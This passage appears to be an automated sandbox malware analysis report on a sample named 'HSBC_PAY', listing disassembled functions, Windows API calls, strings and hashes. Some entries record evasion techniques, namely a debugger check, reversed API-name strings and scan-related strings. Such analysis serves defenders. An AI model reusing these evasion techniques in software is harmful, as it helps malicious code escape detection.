                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Read$HandleModule
                                                                    • String ID: KernelBase$LoadLibraryExA
                                                                    • API String ID: 2226866862-113032527
                                                                    • Opcode ID: 9235cc2223be4e02ccc3e193d7cd99c3f1128ea94bfaa173ccae814eb59a7cb9
                                                                    • Instruction ID: 950ad84970e00217b7c1480047d6d674d4d4a080a3e3b25858a7092bc212f194
                                                                    • Opcode Fuzzy Hash: 9235cc2223be4e02ccc3e193d7cd99c3f1128ea94bfaa173ccae814eb59a7cb9
                                                                    • Instruction Fuzzy Hash: 5D3170B1A40215BBEF10DF6ACDC1F9A77FDEF05718F004511EA449B281DB34A950CBA0
                                                                    Function 02A8432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8,?,?,02AAD7A8,02A8655D,02AAC30D), ref: 02A84365
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8,?,?,02AAD7A8,02A8655D,02AAC30D), ref: 02A8436B
                                                                    • GetStdHandle.KERNEL32(000000F5,02A843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8), ref: 02A84380
                                                                    • WriteFile.KERNEL32(00000000,000000F5,02A843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?), ref: 02A84386
                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A843A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$Message
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 1570097196-2970929446
                                                                    • Opcode ID: b257e5fae001ea063c6e0b95d3007a78080f2dc4fe0b8e4682315e217a525fca
                                                                    • Instruction ID: b65d11d6669f5dd6612654c31bd8bc49b5c0e3c028f63d2f8d8f48402206b784
                                                                    • Opcode Fuzzy Hash: b257e5fae001ea063c6e0b95d3007a78080f2dc4fe0b8e4682315e217a525fca
                                                                    • Instruction Fuzzy Hash: 96F0B460AC5341B9FB14B760AE86F69675CAB48F14F540E4CB265A94C4DFA090CACB26
                                                                    Function 02A8AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A8ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                      • Part of subcall function 02A8ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                      • Part of subcall function 02A8ACBC: GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                      • Part of subcall function 02A8ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    • CharToOemA.USER32(?,?), ref: 02A8AE7B
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A8AE98
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AE9E
                                                                    • GetStdHandle.KERNEL32(000000F4,02A8AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AEB3
                                                                    • WriteFile.KERNEL32(00000000,000000F4,02A8AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AEB9
                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A8AEDB
                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A8AEF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 185507032-0
                                                                    • Opcode ID: 87ca59c4535ae5374039a550289f17ba55fbb0357fd8cf82d93abaeffee4a558
                                                                    • Instruction ID: 9ac10b71fa4d86c06a3453bb1fae03479b3b0b11433b4b1ebeb32ea72754a206
                                                                    • Opcode Fuzzy Hash: 87ca59c4535ae5374039a550289f17ba55fbb0357fd8cf82d93abaeffee4a558
                                                                    • Instruction Fuzzy Hash: E91170B25C4240BAE200FBA4CD81F9B77EEAB44710F40092BB755DA1D1DE70E944CF66
                                                                    Function 02A8E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A8E5A5
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A8E5C1
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A8E5FA
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A8E677
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A8E690
                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02A8E6C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                    • Instruction ID: 488165f8040955c23bb0077e88320f7e02a2ebdd5be6ad4b8b50b761bc2d8af8
                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                    • Instruction Fuzzy Hash: E051E5759406299BCB26EB68CE80BD9B3FDAF4D314F0041E5F609E7251DA30AF858F60
                                                                    Function 02A83568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A8358A
                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A835BD
                                                                    • RegCloseKey.ADVAPI32(?,02A835E0,00000000,?,00000004,00000000,02A835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A835D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                    • API String ID: 3677997916-4173385793
                                                                    • Opcode ID: fb4b18b85771f393140cfb63dad60b1e9ef33c991a9bfe3ca1d154d948d253bf
                                                                    • Instruction ID: fea54bc9b475fcff63d83d8fc6793d0a98fd8d68c96a6a7904b6ce26a6451ee9
                                                                    • Opcode Fuzzy Hash: fb4b18b85771f393140cfb63dad60b1e9ef33c991a9bfe3ca1d154d948d253bf
                                                                    • Instruction Fuzzy Hash: 4401B575940208BAEB11EB908D42BBEB7ECEB08B10F1005B1BA05D6980FB74D611CA59
                                                                    Function 02A980C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                    • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                    • API String ID: 667068680-1372893251
                                                                    • Opcode ID: a402c0a02721cce11dc80471eb0cf32e042b82b346f1c03957909828e7d3af6c
                                                                    • Instruction ID: cf1b2a643e9ba21618c04fc667608a76af8a249dc42b45fcaaa083b2295aec24
                                                                    • Opcode Fuzzy Hash: a402c0a02721cce11dc80471eb0cf32e042b82b346f1c03957909828e7d3af6c
                                                                    • Instruction Fuzzy Hash: 5F014F74A80309BFEF00FBA5D941A9E7BEEFB49B10F914464A404D7A00DE34AD058F20
                                                                    Function 02A8A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(?,00000000,02A8AA67,?,?,00000000), ref: 02A8A9E8
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A8AA67,?,?,00000000), ref: 02A8AA18
                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02A8AA23
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A8AA67,?,?,00000000), ref: 02A8AA41
                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02A8AA4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                    • String ID:
                                                                    • API String ID: 4102113445-0
                                                                    • Opcode ID: f2678bbec4ca094d56ccefe29dd19d86ffa53ff616134036d9b2deec4dcd4815
                                                                    • Instruction ID: c542fcf4d3b2bf1b516f7e106e78832a780f0681058e9d533318ff198118a13b
                                                                    • Opcode Fuzzy Hash: f2678bbec4ca094d56ccefe29dd19d86ffa53ff616134036d9b2deec4dcd4815
                                                                    • Instruction Fuzzy Hash: 7B01A7756806447BF701F6748E12B6EB35DEB45B10F910561F611AAA81DE749E004A64
                                                                    Function 02A8AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(?,00000000,02A8AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A8AAAF
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread
                                                                    • String ID: eeee$ggg$yyyy
                                                                    • API String ID: 4232894706-1253427255
                                                                    • Opcode ID: 1c54777e33f455b455b5aaa4004d332493ea4ea3d5d83809b0f94a35537a70d5
                                                                    • Instruction ID: a639e27affe5d5ade3d8715de65f7534676a65986877b3f33d35face215b3aef
                                                                    • Opcode Fuzzy Hash: 1c54777e33f455b455b5aaa4004d332493ea4ea3d5d83809b0f94a35537a70d5
                                                                    • Instruction Fuzzy Hash: 4141F5B074410A8BD711FBA88AC037EF3F7EB89300B504527D662C7346EE78DD058A21
                                                                    Function 02A98018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                    • API String ID: 1883125708-1952140341
                                                                    • Opcode ID: c3e7a849aa89644c251d930cd031e16d557b27d93936e88053d64bbce14e2348
                                                                    • Instruction ID: c854e159cd88aa193fd0ef2b03283b2e42983c794bd59ffa87797c90a6de4779
                                                                    • Opcode Fuzzy Hash: c3e7a849aa89644c251d930cd031e16d557b27d93936e88053d64bbce14e2348
                                                                    • Instruction Fuzzy Hash: 3CF06D70680309EFEF40FBA5DD4296E77EDFB4AB40B9109A0F404D7A00DE34AD518A60
                                                                    Function 02A9EB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KernelBase,?,02A9EF90,UacInitialize,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString), ref: 02A9EB92
                                                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A9EBA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: IsDebuggerPresent$KernelBase
                                                                    • API String ID: 1646373207-2367923768
                                                                    • Opcode ID: 88f4691e557ed4b865f90e862c0c34fb0adede57b0653dc29e57b86df76c82e3
                                                                    • Instruction ID: 99d518a444396b4e5d73e6493e6983d615b267b6fcf89614580878f3c77b2f42
                                                                    • Opcode Fuzzy Hash: 88f4691e557ed4b865f90e862c0c34fb0adede57b0653dc29e57b86df76c82e3
                                                                    • Instruction Fuzzy Hash: 58D012B13913902DFE04B6F50EC4C1D02CD950592D7244E72B223D50D3FD66C8511511
                                                                    Function 02A8C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02AAC10B,00000000,02AAC11E), ref: 02A8C3FA
                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A8C40B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                    • API String ID: 1646373207-3712701948
                                                                    • Opcode ID: 44d3bd1e1d35cb5e5c9607673ed8ddc0a7069ea664011e1fc127b9cf721f70b8
                                                                    • Instruction ID: f759332acc21d8d83fc42a9e64a97efebfe5a5fd3524a5370d03ce7a68360561
                                                                    • Opcode Fuzzy Hash: 44d3bd1e1d35cb5e5c9607673ed8ddc0a7069ea664011e1fc127b9cf721f70b8
                                                                    • Instruction Fuzzy Hash: DCD0A760EC07425EF7087FB168C963626CAAB1CB25F005837F05156501EF71C4948F70
                                                                    Function 02A8E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A8E217
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A8E233
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A8E2AA
                                                                    • VariantClear.OLEAUT32(?), ref: 02A8E2D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                    • String ID:
                                                                    • API String ID: 920484758-0
                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                    • Instruction ID: 93dd4b450eaba8c20d2e3ec80ee5698d4e2a1329e8181a81e914a3c2912ef52d
                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                    • Instruction Fuzzy Hash: CF414A75A4062D9FCB61EB68CE90BD9B3BDAF49304F0041D5E648E7251DE30AF848F60
                                                                    Function 02A8ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: ff93dbfd5a13cde9ce149979fccef014fe86598c34979e5b982f60b531a647c7
                                                                    • Instruction ID: 08fb01bf2b0d9f0192808b8b06308384c22a8d3ac92961f6e7363c45e4ed8134
                                                                    • Opcode Fuzzy Hash: ff93dbfd5a13cde9ce149979fccef014fe86598c34979e5b982f60b531a647c7
                                                                    • Instruction Fuzzy Hash: CC410B71A402589BDB21EB68CD84BDAB7FDAB08700F4444E6A648E7241EF749F848F50
                                                                    Function 02A8ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: f682b7970e4953dd56d2133d122c73314652c8fc68c45df4cce0ba53e359a38b
                                                                    • Instruction ID: dfe081301347524baa8e1acf252e5dbb67c07f54264c6b844e85fe1b113190d0
                                                                    • Opcode Fuzzy Hash: f682b7970e4953dd56d2133d122c73314652c8fc68c45df4cce0ba53e359a38b
                                                                    • Instruction Fuzzy Hash: 78411D71A402589BDB21FB68CD84BDAB7FDAB08700F4404E6A648E7241EF749F858F50
                                                                    Function 02A81C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
